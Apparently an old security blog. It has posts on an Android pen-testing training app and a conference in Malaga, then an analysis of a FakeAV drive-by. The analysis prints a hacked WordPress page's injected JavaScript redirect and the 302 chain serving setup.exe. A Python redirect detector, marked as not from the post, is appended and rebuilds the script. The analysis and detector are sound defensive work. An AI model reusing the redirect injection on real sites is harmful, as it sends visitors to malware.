Monday, April 16, 2012

Update Malaga: Slides and Demos

So I posted my slides from the Android Talk up on Google Docs. However the real meat is in the demos. I thought I would post mine, but a fellow coworker (Brad, you rock) who has much better video editing software and skills than me has done videos for all the exercises for Hacme Android. You can check out my colleague's presentation on 'Advances in Forensics on the Android' at his website.

One thing I will say about my slides: I say in slide 13 you need to use Windows for this. You don't.... you can use any OS you want (maybe even Solaris... I have not checked) as long as you have the right version of Java (recommend Java 6). I did a copy and paste from the user guide without looking at it too closely... color me embarrassed when touting Windows at an Android con!

Friday, April 13, 2012

Hola from Malaga!

I am here in beautiful, sunny Malaga as I gave a talk (I know right!) regarding Android Security at the Symposium for Android Security. My talk was about a new tool McAfee just came out with to help people learning to pen test Android Apps. Hacme Android is an app you install on an emulated device which is inherently flawed so you can do some testing on it (via proxy or decompiling) to see just how broken you can get it. And (even better) there is a How-To guide in case you get flustered/lost so you can eventually get to the intended result. I think it went OK... I didn't trip on my way up the stage so I am already winning. I want to become better at public speaking and I figure the best way is to get up there and chat!
I learned a good deal about Android while writing up my presentation, but not as much as I learned at the conference. The other talks there were awesome, with some pretty amazing and innovative ideas coming out. Some people presented on obfuscation of malware on Android devices, some talked about how to determine if you are running in an emulator or on a real phone (think Blue Pill for Android), and others talked about memory analysis for Android (Iz does not have the slides up yet, but keep checking as he will probably have them up soon!). Did you know you HAVE to be root to obtain full memory dumps from Android? Did you know the only way to do that is to exploit the phone? (Is that the same for iPhones?) Imagine trying to explain that in court to a judge and jury.... oh dear! You can view all the presentation topics here, and I think the slides from ALL the presenters will be on the first link (Symposium) soon.

If anything, this conference reminded me that there is no shortage of new things to learn in the computer security field, be it forensics, pen testing or reverse engineering. It seems like a never-ending list in fact, which is both comforting and daunting :) Maybe I will post a blog about my learnings too!

I should mention the link to the Hacme Android Application is now live and operational. If you have any interest in pentesting Android Apps (or potentially seeing how flawed they can be), I recommend taking a look. What's the harm... it's free!

Some other interesting tools now on my Check-These-Out-List:

I leave you all with a couple of pictures from Malaga, I highly recommend it here. Lovely weather, walkable city, very close to the mountains or beach, and (of course) amazing food and wine :)

A bit of playa y montaña. This was taken from the Malagueta beach. The port (puerto) is very close by, which has some amazing restaurants and good views of all the yachts in the harbour. PROTIP: Go to the Cervecería La Sureña at the port and get a bucket of beer (5) for 3 euros. What a bargain!!


View from the top of the hill near the Alcazaba. The yellow building is the Ayuntamiento de Málaga.

Tuesday, April 03, 2012

Sometimes Trouble Finds You....

It was a simple search. Nothing more. I was looking for a picture of Dr. Sheldon Cooper from The Big Bang Theory. I go to Google Images and I (thought I) found such a nice one. I click on the thumbnail and suddenly this popped up (in a browser window):


Ruh ruh Raggy!!

Methinks the browser doth protest too much.... looks like we have a FakeAV on our hands. Quick-- to the VM!

So I fire up my Windows XP image and start CaptureBAT on it. I go right back to the same image I went to before and clicked it, and kerpow the same website (kxxxxdefend.info/68efd410a6a48b3c/2/) with the 'Potential Security Alerts'. This time though I download the executable, which is 'setup.exe'.

Now wait a darn tootin minute here... how did we get to this other site? What happened to the original domain I requested (which I censored to protect the innocent)? Well this TCP dump could help shed some light.

Request:

GET /wp-content/plugins/slickr-flickr/sheldon-wallpaper HTTP/1.1
Host: xxxxxxxx.xxx
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: hxxp://www.google.co.uk/imgres?q=sheldon+cooper&hl=en&biw=1040&bih=768&gbv=2&tbm=isch&tbnid=Jccw2M05I0r6bM:&imgrefurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper&docid=qrYUJpskfIVYMM&imgurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper.jpg&w=1024&h=824&ei=jxN7T82RNsG_0QXY9724CQ&zoom=1&iact=hc&vpx=508&vpy=358&dur=34125&hovh=201&hovw=250&tx=101&ty=191&sig=107143226035704011362&page=2&tbnh=135&tbnw=166&start=26&ndsp=29&ved=1t:429,r:14,s:26
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response:
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2012 15:14:07 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

9f 

script var url = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"; if (window!=top) {top.location.href = url;} else { document.location= url;} /script
0


I actually had to remove the '<' and '>' else Google nicely tried to execute the script.... how thoughtful of them....

So I highlighted the interesting stuff in bold. So Slickr-Flickr is a plugin which allows a user to easily display Flickr photos in your blog. Cool. The script code confirms that something definitely happened to this guy's site. Someone was able to upload a malicious redirect via (probably? I am not the best websec chick) the plugin or WordPress itself. Regardless... not cool man-- to Malzilla!

So browsing via Malzilla shows us the code for the page we saw earlier:


So again I tried to highlight the good bits (I added the Moose text... ). We see a popup saying your computer is infected... no matter what you do, it calls the function 'al'... which gets us the ol' familiar warning of impending doom on your computer. It basically says in the coordinates that happen to be over the 'Clean Computer' button, go to the download page. If you try to click the 'X' box, the function al is called again. Anyways, let's point Mozilla to the 'download' page and see what happens.....



OMG! Another redirect! This is getting silly don't you think? Luckily as we can see this is the end... and we get our setup.exe. Look quickly again at the response we received when going to the download page:

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 03 Apr 2012 16:22:37 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe


So we got to the 'download' page only to be pushed somewhere else. Info about the file:
  • Name: setup.exe
  • MD5: 22D7CF7B0591E8C9688769D5F502DDF4
  • SHA-256: 1b9c0e6709b163e918477711c384705a8ef28eea776d58b86f49a98998ae8595
  • Size: 2187394 bytes
  • What VirusTotal Says: 5/42 AVs say it's bad. Report here.
So this type of redirect can happen more often than one would like to believe. Here are some links discussing it (PCWorld, KrebsOnSecurity, and this lady named Julian Evans). Make sure you have good AV... or better yet, use NoScript or something similar. If you have a WordPress site and are worried about things like this... WP has an exploit scanner you can run!
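Added example, not from this post and not part of Malzilla or CaptureBAT: a small Python detector for the two kinds of hop seen in this chain, the injected top/document.location script inside the chunked 200 from the compromised blog, and the 302 Location that hands over setup.exe. The two sample responses are constructed from the post's defanged URLs, and the regexes and function names are my own.

```python
import re

# Constructed samples modelled on the post's captures (its defanged URLs): the
# chunked 200 with the injected script, and the 302 that hands over setup.exe.
FAKEAV_URL = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"
EXE_URL = "hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe"
SCRIPT = ('<script> var url = "%s"; if (window!=top) {top.location.href = url;}'
          ' else { document.location= url;} </script>' % FAKEAV_URL)
BLOG_200 = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nTransfer-Encoding: "
            "chunked\r\n\r\n%x\r\n%s\r\n0\r\n\r\n" % (len(SCRIPT), SCRIPT))
DOWNLOAD_302 = ("HTTP/1.1 302 Moved Temporarily\r\nServer: nginx\r\n"
                "Content-Length: 0\r\nLocation: %s\r\n\r\n" % EXE_URL)

JS_VAR = re.compile(r"""var\s+(\w+)\s*=\s*["']([^"']+)["']""")
JS_REDIRECT = re.compile(
    r"""(?:top|window|document)\.location(?:\.href)?\s*=\s*(\w+|"[^"]+"|'[^']+')""")

def dechunk(body):
    """Reassemble a Transfer-Encoding: chunked body (hex size line per chunk)."""
    out, pos = [], 0
    while True:
        end = body.index("\r\n", pos)
        size = int(body[pos:end].split(";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return "".join(out)
        out.append(body[end + 2:end + 2 + size])
        pos = end + 2 + size + 2                      # data plus its CRLF

def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in header_lines)}
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return int(status_line.split()[1]), headers, body

def find_redirect(raw):
    """URL the response pushes the browser to (3xx Location or injected JS), else None."""
    status, headers, body = parse_response(raw)
    if 300 <= status < 400 and "location" in headers:
        return headers["location"]
    js_vars = dict(JS_VAR.findall(body))
    for target in JS_REDIRECT.findall(body):
        if target[0] in "\"'":
            return target[1:-1]            # literal URL assigned directly
        if target in js_vars:
            return js_vars[target]         # URL parked in a variable, as here
    return None
```

Run over a proxy or pcap export one response at a time, each hop's URL is the key to look up the next captured response, so the chain blog -> FakeAV page -> setup.exe falls out without opening anything in a browser.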

As Dr. Cooper would say: BAZINGA